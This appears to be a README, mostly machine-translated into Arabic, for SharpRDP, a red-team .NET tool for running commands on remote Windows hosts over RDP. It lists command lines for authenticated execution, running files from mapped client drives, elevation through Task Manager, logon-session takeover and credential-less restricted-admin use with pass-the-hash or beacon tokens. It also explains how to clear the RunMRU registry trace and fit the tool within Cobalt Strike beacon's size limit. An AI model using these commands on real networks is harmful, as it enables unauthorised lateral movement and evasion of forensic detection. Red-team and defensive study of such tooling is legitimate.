
تطبيق .NET Console لبروتوكول سطح المكتب البعيد لتنفيذ الأوامر المُوثَّقة
للترجمة، افتح المشروع في Visual Studio وقم ببنائه للإصدار. سيتم إخراج ملفين DLL إلى دليل Release، لا تحتاج إليهما لأن ملفات DLL موجودة في التجميعة.
إذا كنت لا ترغب في استخدام ملفات DLL المقدمة، فستحتاج إلى .NET SDK لإنشاء ملف DLL الخاص بـ AxMSTSCLib.dll. لإنشائه، ستحتاج إلى تشغيل aximp من SDK على mstscax.dll. %<SDK dir>%\aximp.exe %windir%\system32\mstscax.dll. يجب الإشارة إلى ملفات DLL هذه بواسطة المشروع لإنشاء ملفات Interop DLL.
ستحتاج أيضًا إلى ضغط ملفات DLL باستخدام Deflate وتسميتها AxInterop.MSTSCLib.dll.bin و Interop.MSTSCLib.dll.bin
Regular RDP connection and execution
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
Exec program as child process of cmd or powershell
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password exec=cmd
Use restricted admin mode
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe"
Connect first host drives
SharpRDP.exe computername=domain.target command="\\tsclient\C\Temp\file.exe" username=domain\user password=password connectdrive=true
Execute command elevated through Run Dialog - CURRENTLY BUGGED
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password elevated=winr
Execute command elevated through task manager
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password elevated=taskmgr
Add Network Level Authentication
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password nla=true
Ask to take over logon session
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password takeover=true
إذا كان وضع المسؤول المقيد ممكّنًا على الهدف، فلا تحدد أي بيانات اعتماد وسيستخدم سياق المستخدم الحالي. يمكن استخدام PTH أو make_token في beacon أو runas /netonly على نظام Windows.
يبدأ جميع التنفيذ من مربع حوار تشغيل Windows (Win+R). سيتم إنشاء مفتاح تسجيل في HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU مع الأمر الذي قمت بتنفيذه. إذا كنت ترغب في إزالة هذا، يمكنك استخدام: CleanRunMRU: الحصول على قيم RunMRU أو مسحها
ضع في اعتبارك أنه إذا قمت بتنفيذ برنامج مثل msbuild (أنا متأكد من وجود آخرين)، فستظهر نافذة cmd أثناء تشغيل العملية. إذا قمت بذلك، فمن المحتمل أن يكون من الأفضل ترحيل العملية وقتل العملية الأصلية.
يتم تجميع ملفات DLL المطلوبة في التجميعة ويتم استخدام حدث حل تجميعة نطاق التطبيق. نظرًا لحجم ملفات DLL، يتم ضغطها وفك ضغطها في وقت التشغيل (لتتمكن من تلبية حد حجم 1 ميجابايت الخاص بـ beacon).
مدونة عنه موجودة هنا SharpRDP
أيضًا جزء من MoveKit